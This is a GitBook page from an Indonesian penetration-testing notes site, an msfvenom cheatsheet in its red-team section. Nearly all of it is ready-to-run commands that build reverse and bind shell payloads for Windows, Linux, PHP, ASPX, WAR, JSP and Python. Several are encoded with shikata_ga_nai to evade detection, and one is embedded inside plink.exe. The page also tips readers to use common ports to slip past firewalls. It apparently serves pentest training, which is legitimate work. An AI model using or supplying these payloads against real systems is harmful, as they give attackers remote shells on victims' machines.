📃
Anggi's Notes
  • Tentang Penulis
  • Preambule
  • Tutorial Red Team Area (General)
    • Tutorial Setup VirtualBox
    • Tutorial Setup Kali Linux pada VirtualBox
    • Network Adapter Type pada Virtual Box
    • Tutorial Port Forwarding Pada Virtual Box
    • Mempercepat update/upgrade/install Kali Linux
    • Networking in a Nutshell
    • Linux in A Nutshell
    • Linux Command Intro
    • VA-PT Cheatsheet
    • Penetration Testing Guide & Checklist
    • Pentesting Web checklist
    • NMAP Cheatsheet
    • Bind vs Reverse Shell Concept
    • Reverse Shell Cheatsheet
    • Linux TTY Shell Cheat Sheet
    • Menaikkan Common Shell ke Meterpreter
    • Metasploit Cheatsheet
      • msfvenom
      • searchploit
    • Metasploitable-2
    • Metasploitable-3
    • Linux Privilege Escalation
      • Linux Privilege Escalation with Misconfigured /etc/passwd
      • Linux Privilege Escalation with SUID
      • Linux Privilege Escalation with Misconfigured Sudo
      • Linux Privilege Escalation with MSF
    • DVWA
      • Brute Force
        • Low
        • Medium
        • High
      • Command Injection
        • Low
        • Medium
        • High
      • Local File Inclusion
        • Low
        • Medium
        • High
      • File Upload Vulnerability
        • Low
        • Medium
        • High
      • Cross Site Scripting (XSS)
        • Reflected
          • Low
          • Medium
          • High
        • Stored
          • Low
          • Medium
          • High
        • DOM
          • Low
          • Medium
          • High
      • SQL Injection
        • Non Blind
          • Low
          • Medium
          • High
        • Blind
          • Low
          • Medium
          • High
      • CSRF
        • Low
        • Medium
        • High
    • Pentesting Report Sample
    • Tutorial Penggunaan ZAP
    • Windows VA/Audit
      • DetExploit
      • HardeningKitty
      • Tutorial Installasi OWASP ZAP pada Windows OS
    • Linux VA/Audit dengan Lynis
    • Mobile Security Framework (MobSF) Windows Docker
  • Tutorial Red Team Area (Teknik Windows Attack )
    • Reconnaissance Techniques
    • Windows Red Team Exploitation Techniques
    • Windows Red Team Defense Evasion Techniques
  • Tutorial Blue Team Area
    • Merancang SOC
    • IR Playbook
    • Blue Team Opensource Online Tools
    • Wireshark Query Cheatsheet
  • Temuan Celah Keamanan
    • LFI (Directory Traversal) di redacted.co.id
    • Kredensial Database dan Azure Leaks pada redacted.com
    • HTML Injection di Tokopedia
    • 🤪4300$ Bounty from Opensource automate recon tools, why not?
    • I hacked Mastercard 4 times? But How?
    • LFI dan RCE di aset redacted.com
    • FTPd DOS di aset redacted.co.id
    • Gitlab SSRF di redacted.com
    • Firebase Android database Takeover
    • RCE di 11 Subdomain Dell
    • SSRF di redacted.com
    • Reflected XSS di CelticPipes
    • Git Disclosure di redacted.co.id
    • Open Redirection+XSS pada Private Program Bugcrowd
    • Rails Debug Mode Enabled pada redacted.com
Powered by GitBook
On this page
  • List available formats
  • List available payloads for specific platform
  • Windows
  • bat reverse shell
  • exe reverse shell
  • Powershell
  • x64 Bit payload
  • Embedded payload
  • Linux
  • bind shell
  • reverse shell
  • Other Platforms
  • php reverse shell
  • aspx reverse shell
  • Java WAR reverse shell
  • jsp reverse shell
  • python reverse shell

Was this helpful?

  1. Tutorial Red Team Area (General)
  2. Metasploit Cheatsheet

msfvenom

Source https://docs.metasploit.com/

Always use known port for lhost like , 53, 443, 8080 as most of time firewall will block unknown ports traffic and you will not get connection back

List available formats

msfvenom --list formats

List available payloads for specific platform

msfvenom --payload --list-options | grep windows

Windows

bat reverse shell

mostly used with JuicyPotato exploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat

exe reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Powershell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

x64 Bit payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

Embedded payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Windows reverse shell embedded into plink  

Linux

bind shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c

reverse shell

msfvenom  -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f c

Other Platforms

php reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

aspx reverse shell

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.16.3 LPORT=4444 > shell.aspx

Java WAR reverse shell

Most time will used to get shell on tomcat

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

jsp reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp

python reverse shell

msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py
PreviousMetasploit CheatsheetNextsearchploit

Last updated 1 year ago

Was this helpful?